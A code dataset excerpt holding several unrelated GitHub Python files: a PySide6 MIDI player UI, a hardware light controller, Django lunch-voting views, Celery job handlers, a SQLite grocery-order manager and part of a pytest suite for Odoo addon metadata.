+{"seq_id":"41733976101","text":"from PySide6.QtCore import QFile, Signal\nfrom PySide6.QtGui import QAction\nfrom PySide6.QtUiTools import QUiLoader\nfrom PySide6.QtWidgets import (\n\tQApplication,\n\tQFileDialog,\n\tQLabel,\n\tQListWidget,\n\tQListWidgetItem,\n\tQProgressBar,\n\tQPushButton,\n\tQStatusBar,\n\tQStyle,\n)\nfrom pathlib import Path\nfrom threading import Thread\nfrom time import sleep\nfrom typing import Optional\n\nfrom giradischi.backends import backends, get_backend_by_name\nfrom giradischi.utils.midi_player import MidiPlayer\n\nui_path = Path(__file__).parent\n\nclass GiradischiUI(QApplication):\n\tupdate_time = Signal(float)\n\n\tdef __init__(self, file: Optional[Path] = None) -> None:\n\t\t\"\"\"Initialize the UI.\"\"\"\n\t\tsuper().__init__()\n\t\tself.setApplicationName(\"giradischi\")\n\t\tself.setApplicationDisplayName(\"Giradischi\")\n\n\t\tmainwindow_ui_file = QFile(ui_path / \"mainwindow.ui\")\n\t\tmainwindow_ui_file.open(QFile.ReadOnly)\n\n\t\tbackend_selector_dialog_ui_file = QFile(ui_path / \"backend_selector_dialog.ui\")\n\t\tbackend_selector_dialog_ui_file.open(QFile.ReadOnly)\n\n\t\tbackend_settings_dialog_ui_file = QFile(ui_path / \"backend_settings_dialog.ui\")\n\t\tbackend_settings_dialog_ui_file.open(QFile.ReadOnly)\n\n\t\tloader = QUiLoader()\n\t\tself.mainwindow = loader.load(mainwindow_ui_file)\n\t\tself.backend_selector_dialog = loader.load(backend_selector_dialog_ui_file)\n\t\tself.backend_settings_dialog = loader.load(backend_settings_dialog_ui_file)\n\n\t\t# mainwindow\n\t\tself.status_bar: QStatusBar = self.mainwindow.findChild(QStatusBar, \"statusBar\")\n\n\t\tself.open_file_action: QAction = self.mainwindow.findChild(QAction, \"openFileAction\")\n\t\tself.open_file_action.triggered.connect(self._select_file)\n\n\t\tself.open_file_button: QPushButton = self.mainwindow.findChild(QPushButton, \"openFileButton\")\n\t\tself.open_file_button.setIcon(self.style().standardIcon(QStyle.SP_DirIcon))\n\t\tself.open_file_button.clicked.connect(self._select_file)\n\n\t\tself.play_button: QPushButton = self.mainwindow.findChild(QPushButton, \"playPauseButton\")\n\t\tself.play_button.setIcon(self.style().standardIcon(QStyle.SP_MediaPlay))\n\t\tself.play_button.clicked.connect(self._play_pause)\n\n\t\tself.stop_button: QPushButton = self.mainwindow.findChild(QPushButton, \"stopButton\")\n\t\tself.stop_button.setIcon(self.style().standardIcon(QStyle.SP_MediaStop))\n\t\tself.stop_button.clicked.connect(self._stop)\n\n\t\tself.settings_button: QPushButton = self.mainwindow.findChild(QPushButton, \"settingsButton\")\n\t\tself.settings_button.setIcon(self.style().standardIcon(QStyle.SP_MediaVolume))\n\t\tself.settings_button.clicked.connect(self._open_backend_selector_dialog)\n\n\t\tself.title_label: QLabel = self.mainwindow.findChild(QLabel, \"titleLabel\")\n\t\tself.current_time_label: QLabel = self.mainwindow.findChild(QLabel, \"currentTimeLabel\")\n\t\tself.duration_time_label: QLabel = self.mainwindow.findChild(QLabel, \"durationTimeLabel\")\n\t\tself.progress_bar: QProgressBar = self.mainwindow.findChild(QProgressBar, \"progressBar\")\n\n\t\t# backend_selector_dialog\n\t\tself.backend_selector_list_widget: QListWidget = self.backend_selector_dialog.findChild(QListWidget, \"backendSelectorListWidget\")\n\t\tself.backend_selector_list_widget.itemClicked.connect(self._change_backend)\n\n\t\tself.backend_settings_button: QPushButton = self.backend_selector_dialog.findChild(QPushButton, \"backendSettingsButton\")\n\t\tself.backend_settings_button.clicked.connect(self._open_backend_settings_dialog)\n\n\t\t# backend_settings_dialog\n\t\tself.backend_settings_list_widget: QListWidget = self.backend_settings_dialog.findChild(QListWidget, \"devicesListWidget\")\n\t\tself.backend_settings_list_widget.itemClicked.connect(self._change_device)\n\n\t\tself.midi_player = MidiPlayer()\n\t\tself.opened_file: Optional[Path] = None\n\n\t\tself.update_time.connect(self._update_time_label)\n\n\t\tself.time_label_thread = Thread(target=self._daemon, daemon=True)\n\t\tself.time_label_thread.start()\n\n\t\tif file and file.suffix == \".mid\":\n\t\t\tself._open_file(file)\n\n\tdef start_ui(self):\n\t\tself.mainwindow.show()\n\n\t\tself.exec()\n\n\tdef _update_time_label(self, time: float):\n\t\tif not self.midi_player.is_stopped():\n\t\t\tself.current_time_label.setText(self._format_time(time))\n\t\t\tself.progress_bar.setValue(time)\n\t\telse:\n\t\t\tself.current_time_label.setText(\"00:00\")\n\t\t\tself.progress_bar.setValue(0)\n\n\tdef _daemon(self):\n\t\twhile True:\n\t\t\tself.update_time.emit(self.midi_player.current_time)\n\t\t\tsleep(1)\n\n\tdef _select_file(self) -> None:\n\t\tfilename, _ = QFileDialog.getOpenFileName(self.mainwindow,\n\t\t\t\t\"Select MIDI file\", \"\", \"MIDI files (*.mid)\")\n\t\tif not filename:\n\t\t\treturn\n\n\t\tself._open_file(Path(filename))\n\n\tdef _open_file(self, file: Path):\n\t\tself.opened_file = file\n\n\t\tself.midi_player.open_file(self.opened_file)\n\t\tassert self.midi_player.file, \"MidiFile is None\"\n\n\t\tself.title_label.setText(self.opened_file.name)\n\n\t\tfile_length = self.midi_player.file.get_length()\n\t\tself.duration_time_label.setText(self._format_time(file_length))\n\t\tself.progress_bar.setMaximum(file_length)\n\n\tdef _update_midi_player_ui(self, stopping: bool = False):\n\t\tis_playing = self.midi_player.play_event.is_set()\n\t\tis_stopped = self.midi_player.stop_event.is_set()\n\n\t\tself.play_button.setIcon(self.style().standardIcon(QStyle.SP_MediaPause\n\t\t if is_playing and not stopping\n\t\t else QStyle.SP_MediaPlay))\n\t\tself.settings_button.setEnabled(not is_stopped)\n\n\tdef _play_pause(self) -> None:\n\t\ttry:\n\t\t\tself.midi_player.toggle()\n\t\texcept Exception as e:\n\t\t\tself.status_bar.showMessage(f\"Error: {e}\")\n\t\t\treturn\n\n\t\tself._update_midi_player_ui()\n\n\tdef _stop(self):\n\t\ttry:\n\t\t\tself.midi_player.stop()\n\t\texcept Exception as e:\n\t\t\tself.status_bar.showMessage(f\"Error: {e}\")\n\t\t\treturn\n\n\t\tself._update_midi_player_ui(True)\n\n\t@staticmethod\n\tdef _format_time(time: float) -> str:\n\t\tminutes = int(time // 60)\n\t\tseconds = int(time % 60)\n\t\treturn f\"{minutes:02}:{seconds:02}\"\n\n\tdef _open_backend_selector_dialog(self):\n\t\tbackends_names = [backend.name for backend in backends]\n\t\tself.backend_selector_list_widget.clear()\n\t\tself.backend_selector_list_widget.addItems(backends_names)\n\n\t\tif self.midi_player.backend:\n\t\t\tcurrent_backend = self.midi_player.backend.name\n\t\t\tif current_backend in backends_names:\n\t\t\t\tself.backend_selector_list_widget.setCurrentRow(backends_names.index(current_backend))\n\n\t\tself.backend_selector_dialog.show()\n\n\tdef _open_backend_settings_dialog(self):\n\t\tif not self.midi_player.backend:\n\t\t\treturn\n\n\t\tdevices = self.midi_player.backend.get_devices()\n\t\tself.backend_settings_list_widget.clear()\n\t\tself.backend_settings_list_widget.addItems(devices)\n\n\t\tcurrent_device = self.midi_player.backend.get_device()\n\t\tif current_device in devices:\n\t\t\tself.backend_settings_list_widget.setCurrentRow(devices.index(current_device))\n\n\t\tself.backend_settings_dialog.show()\n\n\tdef _change_backend(self, item: QListWidgetItem):\n\t\tnew_backend_name = item.text()\n\t\tif self.midi_player.backend and (new_backend_name == self.midi_player.backend.name):\n\t\t\treturn\n\n\t\ttry:\n\t\t\tbackend = get_backend_by_name(new_backend_name)\n\t\texcept Exception as e:\n\t\t\tself.status_bar.showMessage(f\"Error: {e}\")\n\t\t\treturn\n\n\t\ttry:\n\t\t\tself.midi_player.set_backend(backend)\n\t\texcept Exception as e:\n\t\t\tself.status_bar.showMessage(f\"Error: {e}\")\n\n\tdef _change_device(self, item: QListWidgetItem):\n\t\tassert self.midi_player.backend, \"Backend is None\"\n\t\tself.midi_player.backend.set_device(item.text())\n","repo_name":"python-midi/giradischi","sub_path":"giradischi/ui/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34981425027","text":"from proboter.event_bus import EventBus\nfrom proboter.hardware import LightController, LightControllerConfig\n\nfrom .usb_axes_controller import UsbAxesController\n\n\nclass UsbLightController(LightController):\n \"\"\"\n A simulated light controller which is always connected\n and only keeps track of the on / off value\n \"\"\"\n\n def __init__(self, axes_controller: UsbAxesController,\n event_bus: EventBus) -> None:\n LightController.__init__(self,\n LightControllerConfig(),\n event_bus)\n self._axes_controller = axes_controller\n\n async def start(self) -> None:\n \"\"\"\n Set up and initialize the hardware unit\n \"\"\"\n await self.sync()\n\n async def stop(self) -> None:\n \"\"\"\n Shutdown the hardware unit\n \"\"\"\n # Nothing to do here\n self.status.connected = False\n await self._status_changed()\n\n async def sync(self) -> None:\n \"\"\"\n Force a synchronization with the state of the light controller hardware\n \"\"\"\n self.status.connected = self._axes_controller.is_connected\n if self.status.connected:\n light_intensity = await self._axes_controller.get_light_intensity()\n self.status.on = light_intensity != self._axes_controller.MIN_LIGHT_INTENSITY\n else:\n self.status.on = False\n await self._status_changed()\n\n async def switch_on(self) -> None:\n \"\"\"\n Turn the light on\n \"\"\"\n await self._axes_controller.set_light_intensity(\n UsbAxesController.MAX_LIGHT_INTENSITY)\n self.status.on = True\n await self._status_changed()\n\n async def switch_off(self) -> None:\n \"\"\"\n Turn the light off\n \"\"\"\n await self._axes_controller.set_light_intensity(\n UsbAxesController.MIN_LIGHT_INTENSITY)\n self.status.on = False\n await self._status_changed()\n","repo_name":"schutzwerk/PROBoter","sub_path":"software/hardware-control/proboter/hardware/usb/usb_light_controller.py","file_name":"usb_light_controller.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"32"} +{"seq_id":"25280819648","text":"import json\nfrom django.utils import timezone\nfrom rest_framework import status\nfrom rest_framework import mixins\nfrom rest_framework import generics\nfrom rest_framework.permissions import IsAuthenticated,IsAdminUser\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import APIView\nfrom django.db.models import Count, Max\nfrom employee.models.vote import Vote\nfrom datetime import date, timedelta\nfrom resturant.models.resturant import Resturant\nfrom resturant.models.champion_resturant import ChampionResturant\n\nfrom resturant.models import resturant,resturant_menu,resturant_menu_item\nfrom resturant.serializers import resturant_serializers,resturant_menu_serializers,resturant_menu_item_serializers, champion_resturant_serializers\n\n\nclass ResturantDetail(generics.RetrieveUpdateDestroyAPIView):\n permission_classes = [IsAuthenticated,IsAdminUser] \n serializer_class = resturant_serializers.ResturantSerializer\n queryset =resturant.Resturant.objects.all() \n def perform_update(self, serializer_class):\n print(self.request.user)\n return serializer_class.save(updated_by=self.request.user) \n \nclass ResturantList(generics.ListCreateAPIView):\n permission_classes = [IsAuthenticated,IsAdminUser] \n serializer_class = resturant_serializers.ResturantSerializer\n queryset =resturant.Resturant.objects.all() \n \n def perform_create(self, serializer_class):\n return serializer_class.save(created_by=self.request.user,updated_by=self.request.user)\n\nclass ResturantMenuList(generics.ListCreateAPIView):\n permission_classes = [IsAuthenticated,IsAdminUser] \n serializer_class = resturant_menu_serializers.ResturantMenuSerializer\n queryset =resturant_menu.ResturantMenu.objects.all() \n def create(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data)\n data = {}\n if serializer.is_valid():\n serializer.save(created_by=self.request.user,updated_by=self.request.user)\n data=serializer.data\n else:\n data['error'] = serializer.errors\n return Response(data,status=status.HTTP_201_CREATED)\n\nclass ResturantListForVoteView(generics.ListAPIView):\n now = timezone.now()\n permission_classes = [IsAuthenticated] \n serializer_class = resturant_menu_serializers.ResturantMenuVoteSerializer\n queryset =resturant_menu.ResturantMenu.objects.select_related(\"resturant\").filter(menu_date=now).all() \n\n# class ResturantListForVoteView(generics.ListAPIView):\n# now = timezone.now()\n# permission_classes = [IsAuthenticated] \n# serializer_class = resturant_serializers.ResturantListForVoteSerializer\n# #queryset =resturant.Resturant.objects.all()\n# queryset =resturant_menu.Resturant.objects.filter(resturant_menus__menu_date=now).all() \n# \n\nclass ChampionResturants(APIView):\n permission_classes = (IsAdminUser,)\n\n def get(self, request, pk=None, format=None):\n resturant_list_with_count = Vote.objects.filter(vote=True, voting_date=date.today()).\\\n values(\"resturant\").annotate(Count(\"vote\")).order_by(\"-vote__count\")\n\n whole_list = list(resturant_list_with_count)\n expected_list = []\n pass_vote = 0\n for dict in whole_list:\n if dict[\"vote__count\"] < pass_vote:\n break\n champion_yesterday = ChampionResturant.objects.\\\n filter(resturant=dict[\"resturant\"], date=date.today()-timedelta(1)).first()\n champion_day_before_yesterday = ChampionResturant.objects.\\\n filter(resturant=dict[\"resturant\"], date=date.today()-timedelta(2)).first()\n\n if not champion_yesterday or not champion_day_before_yesterday:\n expected_list.append(dict)\n pass_vote=dict[\"vote__count\"]\n try:\n prev_champ = ChampionResturant.objects.filter(date=date.today()).delete()\n except:\n pass\n try:\n _vote_count = expected_list[0][\"vote__count\"]\n except:\n _vote_count = 0\n \n result_list = []\n for dict in expected_list:\n resturant_object = Resturant.objects.get(id=dict[\"resturant\"])\n result_list.append(resturant_object)\n data = {\n \"resturant\": resturant_object.id\n }\n \n champion_serializer = champion_resturant_serializers.ChampionSerializer(data=data)\n \n \n if champion_serializer.is_valid():\n try:\n champion_serializer.save(created_by=request.user, updated_by=request.user)\n except:\n return Response({\"detail\": \"Champions saved before!\"}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({\"detail\": \"Champions could not save!\"}, status=status.HTTP_400_BAD_REQUEST) \n \n serializer = resturant_serializers.ChampionResturantSerializer(result_list, many=True, context={'vote_count': _vote_count})\n return Response(\n data=serializer.data,\n status=status.HTTP_200_OK\n )\n","repo_name":"NahidAkhtar84/lms","sub_path":"lunch_management_system/resturant/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"25066684891","text":"# -*- encoding: utf-8 -*-\n'''\nCreated on 2016年7月11日\n\n@author: hua\n'''\nfrom cabbage.cabbage_celery.cabbage_for_celery import Cabbage\nfrom cabbage.cabbage_celery.cabbage_holder import CabbageHolder\nfrom cabbage.common.cache.cache_holder import CacheHolder\nfrom cabbage.common.log.logger import Logger\nfrom cabbage.constants import JOBS, JOB_DELETE, WORKS\nfrom cabbage.data.store_factory import storeFactory\nfrom cabbage.job.job_cache import JobCacheHolder\nfrom cabbage.job.job_holder import JobHolder\nfrom cabbage.job.task_cache import TaskCacheHolder\nfrom cabbage.monitor.celery_monitor import cabbage_monitor\nimport threading\nlog = Logger.getLogger(__name__)\n\n\ndef workServiceStatusHandler(event):\n if event:\n work = CacheHolder.getCache().get(event.hostName,WORKS)\n if work:\n work.serviceStatus=event.status\n with storeFactory.store() as store:\n store.updateWorkServiceStatus(work)\n \ndef workStatusHandler(event):\n if event:\n work = CacheHolder.getCache().get(event.hostName,WORKS)\n if work:\n work.status=event.status\n with storeFactory.store() as store:\n store.updateWorkStatus(work)\n \ndef addBroberServerHandler(event):\n if event and event.brokerServer:\n brokerServer = event.brokerServer\n Logger.info(log,\"添加队列服务器【%s】,URI:【%s】\"%( brokerServer.hostName,brokerServer.connectUri))\n cabbage = Cabbage(hostName=brokerServer.hostName,broker=brokerServer.connectUri)\n \n CabbageHolder.getServerCabbages()[brokerServer.hostName]= cabbage\n Logger.debug(log,\"添加队列服务器【%s】\"% CabbageHolder.getServerCabbagesStr())\n \ndef monitorBroberServerHandler(event):\n if event and event.brokerServer:\n brokerServer = event.brokerServer\n cabbage = CabbageHolder.getServerCabbages().get(brokerServer.hostName)\n def monitor(cabbage):\n Logger.info(log, \"添加监控【%s】,URI:【%s】\"%( brokerServer.hostName,brokerServer.connectUri))\n cabbage_monitor(cabbage.getApp())\n Logger.info(log, \"添加监控结束\")\n t1 = threading.Thread(target=monitor,args=(cabbage,))\n t1.setDaemon(True)\n t1.start()\n \ndef jobUpdateHandler(event):\n jobId = event.jobId\n status = event.status\n if status == JOB_DELETE:\n jobRun = JobCacheHolder.getJobCache().get(jobId)\n if jobRun : #停止运行TASK\n jobRun.stop()\n with storeFactory.store() as store:\n store.updateJobStatus(jobId, JOB_DELETE)\n #删除缓存让下一个task可以同名\n tasks=CacheHolder.getCache().get(jobId, JOBS).tasks\n for taskName in tasks:\n if TaskCacheHolder.getJobCache().has_key(taskName):\n TaskCacheHolder.getJobCache().remove(taskName)\n \n with storeFactory.store() as store:\n job=store.getJob(jobId)\n CacheHolder.getCache().put(jobId, job,JOBS)\n\ndef jobRemoveHandler(event):\n try:\n jobId = event.jobId\n if JobCacheHolder.getJobCache().has_key(jobId):\n jobRun = JobCacheHolder.getJobCache().get(jobId)\n if jobRun : #停止运行TASK\n jobRun.stop()\n else:\n job =CacheHolder.getCache().get(jobId, JOBS)\n for taskName in job.tasks:\n CabbageHolder.getServerCabbage(job.brokerServer).revokeByTaskName(taskName)\n \n with storeFactory.store() as store:\n store.updateJobStatus(jobId, JOB_DELETE)\n #删除缓存让下一个task可以同名\n tasks=CacheHolder.getCache().get(jobId, JOBS).tasks\n for taskName in tasks:\n if TaskCacheHolder.getJobCache().has_key(taskName):\n TaskCacheHolder.getJobCache().remove(taskName)\n \n CacheHolder.getCache().remove(jobId, JOBS)\n except:\n Logger.exception(log)\n\ndef jobAuditStatusHandler(event):\n jobId = event.jobId\n status = event.status\n with storeFactory.store() as store:\n store.updateAuditStatus(jobId,status)\n\ndef runJob(job,params):\n \n t = job.fileType\n jobId =job.jobId\n jobRun = JobCacheHolder.getJobCache().get(jobId)\n if not jobRun:\n jobRun = JobHolder.getJob(t)(job)\n JobCacheHolder.getJobCache().put(jobId,jobRun)\n \n jobRun.start(params)\n \ndef checkAllWorkBeReady(job):\n jobId=job.jobId\n with storeFactory.store() as store:\n readyWorks = store.getJobWorksReadyDone(jobId)\n notReadyWorks =[]\n isAllBeReady = True\n for work in job.works:\n hostName = work.hostName\n if hostName not in readyWorks:\n notReadyWorks.append(hostName)\n isAllBeReady=False\n \n return (isAllBeReady,notReadyWorks)\n \ndef jobRunHandler(event):\n jobId = event.jobId\n params = event.params\n ignoreNotPerWork = event.ignoreNotPerWork\n \n if not CacheHolder.getCache().hasKey(jobId, JOBS):\n with storeFactory.store() as store:\n job=store.getJob(jobId)\n CacheHolder.getCache().put(jobId, job,JOBS)\n else:\n job = CacheHolder.getCache().get(jobId,JOBS)\n if ignoreNotPerWork:\n runJob(job,params)\n else:\n (isAllBeReady,works)=checkAllWorkBeReady(job)\n if isAllBeReady:\n runJob(job,params)\n else:\n raise Exception(\"works:%s not be ready\"% \",\".join(works))\n \n \n\n \n \n ","repo_name":"alonelaval/cabbage-celery","sub_path":"src/cabbage/event/handler/server_event_handler.py","file_name":"server_event_handler.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"31"} +{"seq_id":"38359204385","text":"# Standard Imports\nimport sqlite3\nimport pandas as pd\nfrom datetime import datetime\nfrom typing import Union\n\n# Project-specific Imports\nfrom path_management.base import get_database_path\nfrom receipt_reader.SainsburysReceipt import SainsburysReceipt\n\n\n# Absolute Path to the sqlite3 database\nDATABASE_FILE = get_database_path()\n\n\nclass OrderDataManager():\n \"\"\"\n Class to manipulate \"order_info\" and \"order_items\" tables.\n \n Attributes\n ----------\n No attributes\n \n Methods\n -------\n _create_order_tables(self)\n (PRIVATE) Create two tables \"order_info\" and \"order_items\" within the database.\n \n check_if_date_exist(self, date: datetime)\n (PUBLIC) Get dataframe of order dates\n \n get_all_dates(self)\n (PUBLIC) Get all order dates available in the database\n \n upload_order(self, receipt: SainsburysReceipt)\n (PUBLIC) Insert the order information into \"order_info\" and \"order_items\"\n \n delete_order_by_date(self, receipt: Sainsburys Receipt)\n (PUBLIC) Given an order date, delete all relevant information from \"order_info\" and \"order_items\"\n \n update_order_by_date(self, pd.DataFrame)\n (PUBLIC) Given an order date,\n \n \"\"\"\n \n def __init__(self):\n \n # Create order tables IF NOT EXISTS\n self._create_order_tables()\n \n \n # DATABASE MANAGEMENT\n # ------------------------------------------------------------------------------------------------------------------ \n def _create_order_tables(self):\n \"\"\"Create two tables \"order_info\" and \"order_items\" to store all information regarding the order.\"\"\"\n\n with sqlite3.connect(DATABASE_FILE) as conn:\n # Enable foreign key support\n conn.execute(\"PRAGMA foreign_keys = ON;\")\n\n # Create \"order_info\" as the PARENT TABLE\n conn.execute('''\n CREATE TABLE IF NOT EXISTS order_info(\n order_id INTEGER PRIMARY KEY,\n order_date DATE\n ) \n ''')\n # Create \"order_items\" as the CHILD TABLE\n # Define foreign key with CASCADING DELETE so that deleting a particular order_date from \"order_info\"\n # will delete all associated order_id from \"order_items\"\n conn.execute('''\n CREATE TABLE IF NOT EXISTS order_items(\n item_id INTEGER PRIMARY KEY,\n order_id INTEGER,\n weight TEXT,\n item_name TEXT,\n price REAL,\n FOREIGN KEY (order_id) REFERENCES order_info(order_id)\n ON DELETE CASCADE\n ) \n ''')\n return None\n \n \n def check_if_date_exists(self, date: datetime) -> bool:\n \"\"\"Return 1 if this date exists within the database, return 0 if not.\"\"\"\n \n query = \"SELECT COUNT(*) FROM order_info WHERE order_date = ?;\"\n with sqlite3.connect(DATABASE_FILE) as conn:\n cursor = conn.cursor()\n cursor.execute(query, (date,))\n # \"result\" is a tuple with a count of how many times this order_date appeared\n result = cursor.fetchone()\n\n if result[0] > 0:\n print(f\"The date '{date}' exists in the order_info table.\")\n return 1\n print(f\"The date '{date} does not exist in the 'order-info' table.\")\n return 0\n \n \n def get_all_dates(self) -> pd.DataFrame:\n \"\"\"Return a dataframe of a single column containing all \"order_date\" in the database\"\"\"\n query = \"SELECT order_date from order_info\"\n with sqlite3.connect(DATABASE_FILE) as conn:\n order_dates = pd.read_sql_query(query, conn)\n return order_dates\n\n\n def upload_order(self, receipt: SainsburysReceipt):\n \"\"\"Upload the receipt information to the database, pertaining the two tables (order_info and order_items)\"\"\"\n \n # Extract information from pdf and prepare as dataframes to utilize pd.to_sql() \n # Convert order_date to string for readability\n order_date_str = datetime.strftime(receipt.order_date, '%Y-%m-%d %H:%M:%S') \n info_df = pd.DataFrame({'order_id': [receipt.order_id],\n 'order_date': [order_date_str]})\n item_df = receipt.item_df\n \n # If date exists already, terminate the function\n if self.check_if_date_exists(order_date_str):\n return \"This is already available within the database.\"\n \n # Append this data as new rows\n with sqlite3.connect(DATABASE_FILE) as conn: \n info_df.to_sql('order_info', conn, if_exists='append', index=False)\n item_df.to_sql('order_items', conn, if_exists='append', index=False)\n \n return \"Data uploaded to database\"\n \n \n def delete_order_by_date(self, order_date: datetime):\n \"\"\"Delete all rows related to the order_date from both tables (order_info and order_items)\"\"\"\n \n # Ensure order_date is in proper string format since it is what's stored in the database \n if isinstance(order_date, datetime):\n order_date = datetime.strftime(order_date, \"%Y-%m-%d %H:%M:%S\")\n \n # Delete from parent table \"order_info\" and allow it to cascade down to \"order_items\"\n delete_query = \"DELETE FROM order_info WHERE order_date = ?\"\n with sqlite3.connect(DATABASE_FILE) as conn:\n conn.execute(\"PRAGMA foreign_keys = ON;\") # Enable foreign key support\n conn.execute(delete_query, (order_date, ))\n \n def load_order_items_by_date(self, order_date: Union[datetime, str]) -> pd.DataFrame:\n \"\"\"\n Load the \"order_info\" table from the database as an attribute \"self.order_info_df\".\n \n This attribute can then be modified by external means. This dataframe can then be uploaded to the database\n using \"update_order_info_by_date\".\n \"\"\"\n query = \"\"\"\n SELECT * FROM order_items AS items\n WHERE items.order_id IN (\n SELECT info.order_id FROM order_info AS info\n WHERE info.order_date = ?\n )\n \"\"\"\n with sqlite3.connect(DATABASE_FILE) as conn:\n df = pd.read_sql_query(query, conn, params=[order_date, ])\n return df\n","repo_name":"GZwong/grocery-manager","sub_path":"data_management/OrderDataManager.py","file_name":"OrderDataManager.py","file_ext":"py","file_size_in_byte":6446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11916638892","text":"import subprocess\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Optional, Union\n\nimport pytest\nfrom pkg_metadata import msg_to_json\n\nfrom manifestoo_core.exceptions import (\n InvalidDistributionName,\n UnsupportedManifestVersion,\n UnsupportedOdooSeries,\n)\nfrom manifestoo_core.metadata import (\n POST_VERSION_STRATEGY_DOT_N,\n POST_VERSION_STRATEGY_NINETYNINE_DEVN,\n POST_VERSION_STRATEGY_NONE,\n POST_VERSION_STRATEGY_P1_DEVN,\n _author_email,\n _filter_odoo_addon_dependencies,\n _no_nl,\n addon_name_to_distribution_name,\n addon_name_to_requirement,\n distribution_name_to_addon_name,\n metadata_from_addon_dir,\n)\nfrom manifestoo_core.odoo_series import OdooSeries\n\n\ndef _no_none(d: Dict[str, Any]) -> Dict[str, Any]:\n return {k: v for k, v in d.items() if v is not None}\n\n\ndef _m( # noqa: PLR0913 too many arguments\n tmp_path: Path,\n *,\n addon_dir_name: str = \"addon1\",\n # manifest\n name: Optional[str] = \"Addon 1\",\n version: str = \"14.0.1.0.0\",\n summary: Optional[str] = None,\n description: Optional[str] = None,\n readme_rst: Optional[str] = None,\n depends: Optional[List[str]] = None,\n external_dependencies: Optional[Dict[str, List[str]]] = None,\n website: Optional[str] = None,\n author: Optional[str] = None,\n license: Optional[str] = None,\n development_status: Optional[str] = None,\n # options\n depends_override: Optional[Dict[str, str]] = None,\n external_dependencies_override: Optional[\n Dict[str, Dict[str, Union[str, List[str]]]]\n ] = None,\n external_dependencies_only: Optional[bool] = None,\n odoo_series_override: Optional[str] = None,\n odoo_version_override: Optional[str] = None,\n post_version_strategy_override: Optional[str] = None,\n precomputed_metadata_file: Optional[Path] = None,\n) -> Dict[str, Any]:\n addon_dir = tmp_path / addon_dir_name\n addon_dir.mkdir()\n addon_dir.joinpath(\"__init__.py\").touch()\n manifest_path = addon_dir / \"__manifest__.py\"\n manifest_path.write_text(\n repr(\n _no_none(\n {\n \"name\": name,\n \"version\": version,\n \"summary\": summary,\n \"description\": description,\n \"depends\": depends,\n \"external_dependencies\": external_dependencies,\n \"website\": website,\n \"author\": author,\n \"license\": license,\n \"development_status\": development_status,\n },\n ),\n ),\n )\n if readme_rst:\n readme_path = addon_dir / \"README.rst\"\n readme_path.write_text(readme_rst)\n return msg_to_json(\n metadata_from_addon_dir(\n addon_dir,\n options={\n \"depends_override\": depends_override,\n \"external_dependencies_override\": external_dependencies_override,\n \"external_dependencies_only\": external_dependencies_only,\n \"odoo_series_override\": odoo_series_override,\n \"odoo_version_override\": odoo_version_override,\n \"post_version_strategy_override\": post_version_strategy_override,\n },\n precomputed_metadata_file=precomputed_metadata_file,\n ),\n )\n\n\ndef test_basic(tmp_path: Path) -> None:\n assert _m(tmp_path) == {\n \"name\": \"odoo14-addon-addon1\",\n \"version\": \"14.0.1.0.0\",\n \"summary\": \"Addon 1\",\n \"requires_dist\": [\"odoo>=14.0a,<14.1dev\"],\n \"requires_python\": \">=3.6\",\n \"classifier\": [\n \"Programming Language :: Python\",\n \"Framework :: Odoo\",\n \"Framework :: Odoo :: 14.0\",\n ],\n \"metadata_version\": \"2.1\",\n }\n\n\n@pytest.mark.parametrize(\n (\"odoo_series\", \"expected\"),\n [\n (\"8.0\", [\"odoo>=8.0a,<9.0a\"]),\n (\"9.0\", [\"odoo>=9.0a,<9.1a\"]),\n (\"10.0\", [\"odoo>=10.0,<10.1dev\"]),\n (\"11.0\", [\"odoo>=11.0a,<11.1dev\"]),\n (\"12.0\", [\"odoo>=12.0a,<12.1dev\"]),\n (\"13.0\", [\"odoo>=13.0a,<13.1dev\"]),\n (\"14.0\", [\"odoo>=14.0a,<14.1dev\"]),\n (\"15.0\", [\"odoo>=15.0a,<15.1dev\"]),\n (\"16.0\", [\"odoo>=16.0a,<16.1dev\"]),\n ],\n)\ndef test_requires_odoo(tmp_path: Path, odoo_series: str, expected: List[str]) -> None:\n assert _m(tmp_path, version=f\"{odoo_series}.1.0.0\")[\"requires_dist\"] == expected\n\n\n@pytest.mark.parametrize(\n (\"odoo_series\", \"expected\"),\n [\n (\"8.0\", \"~=2.7\"),\n (\"9.0\", \"~=2.7\"),\n (\"10.0\", \"~=2.7\"),\n (\"11.0\", \">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*\"),\n (\"12.0\", \">=3.5\"),\n (\"13.0\", \">=3.5\"),\n (\"14.0\", \">=3.6\"),\n (\"15.0\", \">=3.8\"),\n (\"16.0\", \">=3.10\"),\n ],\n)\ndef test_requires_python(tmp_path: Path, odoo_series: str, expected: str) -> None:\n assert _m(tmp_path, version=f\"{odoo_series}.1.0.0\")[\"requires_python\"] == expected\n\n\n@pytest.mark.parametrize(\n (\"odoo_series\", \"expected_prefix\"),\n [\n (\"8.0\", \"odoo8-addon-\"),\n (\"9.0\", \"odoo9-addon-\"),\n (\"10.0\", \"odoo10-addon-\"),\n (\"11.0\", \"odoo11-addon-\"),\n (\"12.0\", \"odoo12-addon-\"),\n (\"13.0\", \"odoo13-addon-\"),\n (\"14.0\", \"odoo14-addon-\"),\n (\"15.0\", \"odoo-addon-\"),\n (\"16.0\", \"odoo-addon-\"),\n ],\n)\ndef test_name_prefix(tmp_path: Path, odoo_series: str, expected_prefix: str) -> None:\n assert (\n _m(tmp_path, name=\"addon1\", version=f\"{odoo_series}.1.0.0\")[\"name\"]\n == f\"{expected_prefix}addon1\"\n )\n\n\ndef test_depends_core_addon(tmp_path: Path) -> None:\n \"\"\"A dependency on a core addon should be ignored.\"\"\"\n assert 